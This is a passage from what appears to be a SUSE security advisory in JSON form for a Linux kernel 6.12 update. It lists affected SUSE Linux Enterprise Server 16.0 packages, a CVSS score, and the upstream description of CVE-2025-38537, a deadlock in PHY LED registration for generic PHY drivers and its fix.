"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38535"
},
{
"cve": "CVE-2025-38537",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38537"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: Don\u0027t register LEDs for genphy\n\nIf a PHY has no driver, the genphy driver is probed/removed directly in\nphy_attach/detach. If the PHY\u0027s ofnode has an \"leds\" subnode, then the\nLEDs will be (un)registered when probing/removing the genphy driver.\nThis could occur if the leds are for a non-generic driver that isn\u0027t\nloaded for whatever reason. Synchronously removing the PHY device in\nphy_detach leads to the following deadlock:\n\nrtnl_lock()\nndo_close()\n ...\n phy_detach()\n phy_remove()\n phy_leds_unregister()\n led_classdev_unregister()\n led_trigger_set()\n netdev_trigger_deactivate()\n unregister_netdevice_notifier()\n rtnl_lock()\n\nThere is a corresponding deadlock on the open/register side of things\n(and that one is reported by lockdep), but it requires a race while this\none is deterministic.\n\nGeneric PHYs do not support LEDs anyway, so don\u0027t bother registering\nthem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
